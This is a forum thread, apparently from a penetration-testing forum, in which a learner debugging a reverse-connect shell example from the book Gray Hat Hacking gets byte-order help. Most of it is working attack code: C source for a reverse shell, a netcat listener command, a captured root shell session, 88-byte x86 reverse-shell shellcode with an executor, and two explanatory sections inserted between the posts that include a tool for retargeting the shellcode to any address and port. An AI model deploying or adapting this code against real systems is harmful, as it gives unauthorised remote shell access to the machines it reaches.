Thread: Writing some shellcode, need a little help

  1. #1 g3ksan (Junior Member; Join Date: Jan 2010; Location: Florida; Posts: 93)

    Writing some shellcode, need a little help

    Hey guys,

    I'm working through Gray Hat Hacking and I'm trying to write the reverse connect shellcode example in the book.

    The code originally had serv_addr.sin_addr.s_addr=0x650A0A0A; in it, which is 10.10.10.101. I figured it might be part of the environment in the book, so I changed it to 0x100000F7;, which is 127.0.0.1.

    The book has me run a netcat session as "nc -nlvv -p 49059" and then run the program, which should just connect to the netcat session. nc just sits there, and the program just sits there. When I do a netstat to see what's going on, I get:

    Code:
    #
    tcp        0      0 0.0.0.0:48059           0.0.0.0:*               LISTEN      15795/nc        
    #
    tcp        0      1 192.168.1.69:55624      247.0.0.16:48059        SYN_SENT    16187/reverse_conne
    That is an external IANA reserved IP. When I change the code to reflect the book, it goes out to the proper IP that I hardcoded, which is 10.10.10.101, and when I hardcode my wlan0's IP, it goes out to 12.138.16.84, which is owned by AT&T. When I turn off the internet, the code just exits.

    The book does not provide an environment to code in like Art of Exploitation does, so I'm trying it in BT4. I'm pretty much dumbfounded at this point, I'm not even sure how to troubleshoot this further. I understand if this is considered off topic.

    Thanks in advance!

    Source is below:

    Code:
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <unistd.h>      /* dup2(), execve() */
    
    int main(void)
    {
    	char *shell[2];
    	int soc, remote;
    	struct sockaddr_in serv_addr;
    
    	serv_addr.sin_family = 2;                 /* AF_INET */
    	serv_addr.sin_addr.s_addr = 0x100000F7;   /* the literal this thread is about */
    	serv_addr.sin_port = 0xBBBB;              /* 48059; same bytes in either order */
    	soc = socket(2, 1, 0);                    /* AF_INET, SOCK_STREAM */
    	remote = connect(soc, (struct sockaddr *)&serv_addr, 0x10);
    	dup2(soc, 0);                             /* stdin, stdout, stderr -> socket */
    	dup2(soc, 1);
    	dup2(soc, 2);
    	shell[0] = "/bin/sh";
    	shell[1] = 0;
    	execve(shell[0], shell, 0);
    	return 0;
    }
    Last edited by g3ksan; 07-22-2010 at 02:58 AM. Reason: forgot to write that source was below, etc.

  2. #2 Gitsnik (Very good friend of the forum; Join Date: Jan 2010; Location: The Crystal Wind; Posts: 851)

    Re: Writing some shellcode, need a little help

    Well it's been a while since my C code had to do this, but is s_addr in network byte order?

    Presumably you're compiling your program and sending it out, so why not inet_aton("127.0.0.1"); instead of 0x100000F7 to see what happens (assuming I got the right function call etc. but you know what to do).

    Beej's guide to network programming is golden for keeping this simple enough to read through. Then you can do your conversions and see how things go.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  3. #3 lupin (Super Moderator; Join Date: Jan 2010; Posts: 2,943)

    Re: Writing some shellcode, need a little help

    It appears to be specifying the address in reverse hex format.

    e.g. from the line of code as follows:

    Code:
    serv_addr.sin_addr.s_addr=0x100000F7;
    We obtain the address:

    Code:
    0x100000F7;
    Break this into 4 individual bytes

    Code:
    0x10, 0x00, 0x00, 0xF7
    The decimal equivalent of which is:

    Code:
    16, 0, 0, 247
    Reverse the order of the bytes to find the IP address:

    Code:
    247.0.0.16
    So if you wanted to connect to an address of 192.168.0.1 (as an example), take the individual values:

    Code:
    192, 168, 0, 1
    Reverse the order:

    Code:
    1, 0, 168, 192
    Convert to hex format:

    Code:
    0x01, 0x00, 0xA8, 0xC0
    Join together:

    Code:
    0x0100A8C0
    And modify the line of code to read as follows:

    Code:
    serv_addr.sin_addr.s_addr=0x0100A8C0;
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.
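The conversion lupin walks through above, worked in code as an added example (this is not code from the thread or from the book, and the function names are my own): one function reproduces the hand procedure and yields the literal you would type on a little-endian x86 host, one does it the portable way with htonl()/inet_pton() as real code should, and one reads a value back byte by byte to show what 0x100000F7 actually addresses.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Parse "a.b.c.d" into four octets. Returns 0 on malformed input. */
static int parse_quad(const char *dotted, unsigned q[4])
{
    char tail;
    if (sscanf(dotted, "%u.%u.%u.%u%c", &q[0], &q[1], &q[2], &q[3], &tail) != 4)
        return 0;
    return q[0] < 256 && q[1] < 256 && q[2] < 256 && q[3] < 256;
}

/* 1 if this host stores the low byte of an integer first (x86 does). */
int host_is_little_endian(void)
{
    uint32_t one = 1;
    return *(const unsigned char *)&one == 1;
}

/* The hand procedure from the reply: octets in reverse order, joined into one
 * number. On a little-endian host this literal lands in memory as a.b.c.d.
 * Pure arithmetic, so the value is the same wherever it is computed. */
uint32_t ipv4_to_le_literal(const char *dotted)
{
    unsigned q[4];
    if (!parse_quad(dotted, q))
        return 0;
    return ((uint32_t)q[3] << 24) | ((uint32_t)q[2] << 16) |
           ((uint32_t)q[1] << 8)  |  (uint32_t)q[0];
}

/* The portable way: first octet most significant, then htonl() to network
 * byte order. This is exactly what inet_pton()/inet_aton() store in s_addr. */
uint32_t ipv4_to_s_addr(const char *dotted)
{
    unsigned q[4];
    if (!parse_quad(dotted, q))
        return 0;
    return htonl(((uint32_t)q[0] << 24) | ((uint32_t)q[1] << 16) |
                 ((uint32_t)q[2] << 8)  |  (uint32_t)q[3]);
}

/* Read an s_addr back in memory order, which is how the kernel sees it.
 * On x86 the page's 0x100000F7 comes out as 247.0.0.16, the netstat target. */
void s_addr_to_ipv4(uint32_t s_addr, char out[16])
{
    unsigned char b[4];
    memcpy(b, &s_addr, 4);
    snprintf(out, 16, "%u.%u.%u.%u", b[0], b[1], b[2], b[3]);
}

/* Fill a sockaddr_in the way the original program should have.
 * Returns 1 on success, 0 on a bad address or port. */
int make_target(const char *ip, unsigned port, struct sockaddr_in *sa)
{
    memset(sa, 0, sizeof *sa);
    sa->sin_family = AF_INET;
    sa->sin_port = htons((uint16_t)port);
    return port <= 65535 && inet_pton(AF_INET, ip, &sa->sin_addr) == 1;
}

int main(void)
{
    char buf[16];
    struct sockaddr_in sa;

    printf("192.168.0.1 as little-endian literal: 0x%08X\n",
           ipv4_to_le_literal("192.168.0.1"));
    printf("127.0.0.1 as little-endian literal:   0x%08X\n",
           ipv4_to_le_literal("127.0.0.1"));
    s_addr_to_ipv4(0x100000F7u, buf);
    printf("0x100000F7 actually addresses:        %s\n", buf);
    if (make_target("127.0.0.1", 48059, &sa)) {
        s_addr_to_ipv4(sa.sin_addr.s_addr, buf);
        printf("make_target -> %s:%u\n", buf, ntohs(sa.sin_port));
    }
    return 0;
}
```

Note that the book's 0x650A0A0A is what ipv4_to_le_literal() returns for 10.10.10.101, and 0x0100007F is what it returns for 127.0.0.1; the port survives either way only because 0xBBBB reads the same in both byte orders, so htons() must still be used for any other port.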

  4. #4 g3ksan (Junior Member; Join Date: Jan 2010; Location: Florida; Posts: 93)

    lupin! thank you very much!

    I was using an online converter; that's probably what did me in. I need to memorize how to do that manually.

    edit: lupin, seriously thank you so much. You have no idea how long I've been staring at this wondering why.

    Code:
    listening on [127.0.0.1] 48059 ...
    connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 56527
    whoami
    root
    And the chapter is finished with a final conversion to opcode! Thank you again lupin, you really made my day

    Also, if you've been thinking about it, writing shellcode and simple exploits are not that hard! Get cracking!

    Code:
    /* 88 bytes: socket(), connect() to 127.0.0.1:48059, dup2() x3, execve("/bin/sh") */
    char sc[] =
            "\x31\xc0\x31\xdb\x31\xd2\x50\x6a\x01\x6a\x02\x89"
            "\xe1\xfe\xc3\xb0\x66\xcd\x80\x89\xc6\x52\x68\x7f"
            "\x00\x00\x01\x66\x68\xbb\xbb\x31\xc9\xb1\x02\x66"
            "\x51\x89\xe1\x6a\x10\x51\x56\x89\xe1\xb3\x03\xb0"
            "\x66\xcd\x80\x31\xc9\xb0\x3f\xcd\x80\x41\xb0\x3f"
            "\xcd\x80\x41\xb0\x3f\xcd\x80\x52\x68\x2f\x2f\x73"
            "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1"
            "\xb0\x0b\xcd\x80";
    
    int main(void) {
            void (*fp)(void);
            /* sc lives in .data; modern toolchains map that non-executable, so
             * build with -z execstack or copy it into an mmap()ed RWX region */
            fp = (void (*)(void))sc;
            fp();
            return 0;
    }
    Last edited by lupin; 07-22-2010 at 08:15 AM. Reason: Merging...
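Reading the finished shellcode back is the check to do before relying on it. The C below is an added example, not code from the thread or the book: the scanner and patch functions are my own and assume this payload's layout, where the sockaddr_in is built with a push imm32 for the address directly followed by a push imm16 for the port. It recovers the target the bytes above connect to, retargets a copy without any endianness arithmetic (the octets are written in the order they are typed and the port high byte first), and counts NUL bytes, which the 127.0.0.1 address introduces and which would truncate the payload through any strcpy()-style sink.

```c
#include <stdio.h>
#include <string.h>

/* The 88 shellcode bytes posted in reply #4 of the thread. */
static const unsigned char sc[] =
    "\x31\xc0\x31\xdb\x31\xd2\x50\x6a\x01\x6a\x02\x89"
    "\xe1\xfe\xc3\xb0\x66\xcd\x80\x89\xc6\x52\x68\x7f"
    "\x00\x00\x01\x66\x68\xbb\xbb\x31\xc9\xb1\x02\x66"
    "\x51\x89\xe1\x6a\x10\x51\x56\x89\xe1\xb3\x03\xb0"
    "\x66\xcd\x80\x31\xc9\xb0\x3f\xcd\x80\x41\xb0\x3f"
    "\xcd\x80\x41\xb0\x3f\xcd\x80\x52\x68\x2f\x2f\x73"
    "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1"
    "\xb0\x0b\xcd\x80";
#define SC_LEN (sizeof(sc) - 1)   /* drop the literal's terminating NUL */

/* Locate `push imm32` (0x68) immediately followed by `push imm16` (0x66 0x68):
 * the imm32 bytes are the IPv4 address in memory order, the imm16 bytes are
 * the port in network order. Returns the offset of the first push, or -1. */
int find_connect_target(const unsigned char *code, size_t len,
                        char ip[16], unsigned *port)
{
    ip[0] = '\0';
    *port = 0;
    for (size_t i = 0; i + 9 <= len; i++) {
        if (code[i] == 0x68 && code[i + 5] == 0x66 && code[i + 6] == 0x68) {
            snprintf(ip, 16, "%u.%u.%u.%u",
                     code[i + 1], code[i + 2], code[i + 3], code[i + 4]);
            *port = ((unsigned)code[i + 7] << 8) | code[i + 8];
            return (int)i;
        }
    }
    return -1;
}

/* Overwrite the address and port in a writable copy. Returns 1 on success,
 * 0 if the pattern is missing or the new target is malformed. */
int patch_connect_target(unsigned char *code, size_t len,
                         const char *ip, unsigned port)
{
    unsigned q[4];
    char tail, cur[16];
    unsigned curport;
    int off = find_connect_target(code, len, cur, &curport);

    if (off < 0 || port > 65535)
        return 0;
    if (sscanf(ip, "%u.%u.%u.%u%c", &q[0], &q[1], &q[2], &q[3], &tail) != 4)
        return 0;
    for (int k = 0; k < 4; k++)
        if (q[k] > 255)
            return 0;
    for (int k = 0; k < 4; k++)
        code[off + 1 + k] = (unsigned char)q[k];   /* a.b.c.d as typed */
    code[off + 7] = (unsigned char)(port >> 8);    /* network order */
    code[off + 8] = (unsigned char)(port & 0xFF);
    return 1;
}

/* NUL bytes end a C string, so a payload delivered via strcpy() stops there. */
size_t count_nul(const unsigned char *code, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        if (code[i] == 0)
            n++;
    return n;
}

int main(void)
{
    char ip[16];
    unsigned port;
    unsigned char copy[SC_LEN];
    int off = find_connect_target(sc, SC_LEN, ip, &port);

    printf("push sequence at offset %d: connects back to %s:%u, %zu NUL byte(s)\n",
           off, ip, port, count_nul(sc, SC_LEN));
    memcpy(copy, sc, SC_LEN);
    if (patch_connect_target(copy, SC_LEN, "10.10.10.101", 4444)) {
        find_connect_target(copy, SC_LEN, ip, &port);
        printf("patched copy: %s:%u, %zu NUL byte(s)\n",
               ip, port, count_nul(copy, SC_LEN));
    }
    return 0;
}
```

The pattern match is deliberately narrow; the two other 0x68 bytes in this payload push "//sh" and "/bin" and are not followed by a 16-bit push, so only the sockaddr_in construction matches. Retargeting to the book's 10.10.10.101 with a port such as 4444 removes both NUL bytes, which is the kind of detail to check when the same bytes have to travel through a string-copying bug rather than a test harness.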
